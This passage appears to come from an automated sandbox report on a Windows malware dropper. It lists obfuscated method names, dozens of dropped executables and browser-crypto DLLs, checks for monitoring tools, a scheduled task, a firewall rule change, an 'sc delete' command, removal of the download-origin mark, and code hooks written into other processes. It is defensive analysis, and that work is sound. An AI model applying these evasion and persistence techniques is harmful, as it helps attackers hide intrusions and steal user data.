Source: Start[1].exe.0.dr, eBAeUnDesS152cY3JS.cs	High entropy of concatenated method names: 'glunn3EuB2', 'tyAqoK1wbucSdSUac8t', 'uVYNpm1QfX3nSHejaW6', 'Vu08Ln13I92fJ5q5dKa', 'v7StPh1CGMw95ji0gcl', 'htjYjP1ZZBXSKIcdwtD', 'ots4fG1NLEk1133Lpqr', 'RaDjRZ1vOoaTso9A3E1', 'EXrGCG1bNMkPQXc6fQ1'
Source: Start[1].exe.0.dr, gBMthepoZSL1ZVKpeA.cs	High entropy of concatenated method names: 'mS8bvPf1qL8gAXwMyqM', 'GbvZ2mfI0tKpfVFwVv7', 'reTlcDMFua', 'L7nmaWfPhHsYwskD2B7', 'Kn3IOjfYGGI79lq4Q27', 'IUkoksf66YPwbeYg9Q0', 'YcRmuIfyQtJlsP3X01n', 'qbHFyZfTbmtOTBsZV43', 'pVfDx9faVB5hw9tPNQ4', 'tcqUGSfrkA0twbBjMil'
Source: fq9BbqPKEgDrDHrc1Aru5zuA.exe.0.dr, Angelo.cs	High entropy of concatenated method names: 'ReturnSpecialList', 'uuNk6g1xbmawQqWEJnm', 'XGjw541qBpxecNpYOhg', 'oOGJq51E5uCPx21pZ4o', 'DP7BUn158x82jjPOdXV', 'DYcDtY1dEEfIQbEmH9h'
Source: fq9BbqPKEgDrDHrc1Aru5zuA.exe.0.dr, eBAeUnDesS152cY3JS.cs	High entropy of concatenated method names: 'glunn3EuB2', 'tyAqoK1wbucSdSUac8t', 'uVYNpm1QfX3nSHejaW6', 'Vu08Ln13I92fJ5q5dKa', 'v7StPh1CGMw95ji0gcl', 'htjYjP1ZZBXSKIcdwtD', 'ots4fG1NLEk1133Lpqr', 'RaDjRZ1vOoaTso9A3E1', 'EXrGCG1bNMkPQXc6fQ1'
Source: fq9BbqPKEgDrDHrc1Aru5zuA.exe.0.dr, gBMthepoZSL1ZVKpeA.cs	High entropy of concatenated method names: 'mS8bvPf1qL8gAXwMyqM', 'GbvZ2mfI0tKpfVFwVv7', 'reTlcDMFua', 'L7nmaWfPhHsYwskD2B7', 'Kn3IOjfYGGI79lq4Q27', 'IUkoksf66YPwbeYg9Q0', 'YcRmuIfyQtJlsP3X01n', 'qbHFyZfTbmtOTBsZV43', 'pVfDx9faVB5hw9tPNQ4', 'tcqUGSfrkA0twbBjMil'
Source: cTThtD77H613MBNsXAevJo07.exe.0.dr, gBMthepoZSL1ZVKpeA.cs	High entropy of concatenated method names: 'reTlcDMFua', 'nW4lBacjpc', 'sMLlkdoJ60', 'I5LlJVOMeQ', 'qdll7OAZFb', 'QEmlZSRGOw', 'WhHyCPsZk', 'N15X2cY3J', 'NWNp5BRFs', 'Q59l6jZOT'
Source: tskTMObYcvz1CtypLgyOWpYi.exe.0.dr, gBMthepoZSL1ZVKpeA.cs	High entropy of concatenated method names: 'reTlcDMFua', 'nW4lBacjpc', 'sMLlkdoJ60', 'I5LlJVOMeQ', 'qdll7OAZFb', 'QEmlZSRGOw', 'rTcT5dcJI', 'N15X2cY3J', 'NWNp5BRFs', 'Q59l6jZOT'

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\DcuyIDqrnrOUlJGUzTDFRaZm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\Y8KGRj_sUjw5KjZpIoRDoSwV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	File created: C:\Users\user\AppData\Local\HTML Professional Kit\is-Q84B1.tmp	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	File created: C:\Users\user\AppData\Local\HTML Professional Kit\libgcc_s_dw2-1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	File created: C:\Users\user\AppData\Local\HTML Professional Kit\libbz2-1.dll (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sqlm[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\Start[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Soft[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	File created: C:\Users\user\AppData\Local\Temp\is-78F35.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Ledger-Live[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File created: C:\Users\user\AppData\Local\Temp\FHCGHJDBFI.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\AFCBAEBAEB.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	File created: C:\Users\user\AppData\Local\Temp\is-78F35.tmp\_isetup\_RegDLL.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	File created: C:\Users\user\AppData\Local\Temp\is-78F35.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	File created: C:\Users\user\AppData\Local\HTML Professional Kit\is-2KU66.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\amadka[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Arab[1].exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	File created: C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Retailer[1].exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	File created: C:\Users\user\AppData\Local\Temp\is-78F35.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	File created: C:\Users\user\AppData\Local\HTML Professional Kit\libvorbis-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\DcuyIDqrnrOUlJGUzTDFRaZm.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	File created: C:\Users\user\AppData\Local\Temp\7zS94A6.tmp\Install.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	File created: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\timeSync[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	File created: C:\Users\user\AppData\Local\HTML Professional Kit\libogg-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\7725eaa6592c80f8124e769b4e8a07f7[1].exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	File created: C:\Users\user\AppData\Local\HTML Professional Kit\is-SG0PM.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	File created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\setup[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	File created: C:\Users\user\AppData\Local\HTML Professional Kit\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	File created: C:\Users\user\AppData\Local\HTML Professional Kit\libwinpthread-1.dll (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\june[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\cad54ba5b01423b1af8ec10ab5719d97[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Software[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS94A6.tmp\Install.exe	File created: C:\Users\user\AppData\Local\Temp\7zSB2BD.tmp\Install.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\DBKKFCBAKK.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	File created: C:\Users\user\AppData\Local\Temp\is-78F35.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\wsjtivv	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Space[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	File created: C:\Users\user\AppData\Local\HTML Professional Kit\is-KPHSL.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	File created: C:\Users\user\AppData\Local\HTML Professional Kit\is-MJB4L.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	File created: C:\Users\user\AppData\Local\HTML Professional Kit\htmlprofessionalkit.exe	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\Y8KGRj_sUjw5KjZpIoRDoSwV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\0e4bf4bb[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\123p[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Jump to dropped file
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\Y8KGRj_sUjw5KjZpIoRDoSwV.exe	File created: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	File created: C:\Users\user\AppData\Local\HTML Professional Kit\is-N48NI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	File created: C:\Users\user\AppData\Local\HTML Professional Kit\is-EPH22.tmp	Jump to dropped file

Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\AFCBAEBAEB.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	File created: C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\DBKKFCBAKK.exe	Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\wsjtivv

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe

File created: C:\Windows\Tasks\explorha.job

Source: C:\Users\user\Desktop\i1crvbOZAP.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules

Jump to behavior

Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe

Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "OBGPQMHF"

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\wsjtivv:Zone.Identifier read attributes | delete

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Memory written: PID: 7608 base: 1370005 value: E9 8B 2F B9 75	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Memory written: PID: 7608 base: 76F02F90 value: E9 7A D0 46 8A	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Memory written: PID: 7608 base: 2E40005 value: E9 2B BA 08 74	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Memory written: PID: 7608 base: 76ECBA30 value: E9 DA 45 F7 8B	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Memory written: PID: 7608 base: 2E50008 value: E9 8B 8E 0C 74	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Memory written: PID: 7608 base: 76F18E90 value: E9 80 71 F3 8B	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Memory written: PID: 7608 base: 2E70005 value: E9 8B 4D D8 72	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Memory written: PID: 7608 base: 75BF4D90 value: E9 7A B2 27 8D	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Memory written: PID: 7608 base: 2E90005 value: E9 EB EB D7 72	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Memory written: PID: 7608 base: 75C0EBF0 value: E9 1A 14 28 8D	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Memory written: PID: 7608 base: 30B0005 value: E9 8B 8A F2 71	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Memory written: PID: 7608 base: 74FD8A90 value: E9 7A 75 0D 8E	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Memory written: PID: 7608 base: 30C0005 value: E9 2B 02 F4 71	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Memory written: PID: 7608 base: 75000230 value: E9 DA FD 0B 8E	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	Memory written: PID: 7680 base: 7FFE22370008 value: E9 EB D9 E9 FF
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	Memory written: PID: 7680 base: 7FFE2220D9F0 value: E9 20 26 16 00
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Memory written: PID: 7688 base: 1BA0005 value: E9 8B 2F 36 75
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Memory written: PID: 7688 base: 76F02F90 value: E9 7A D0 C9 8A
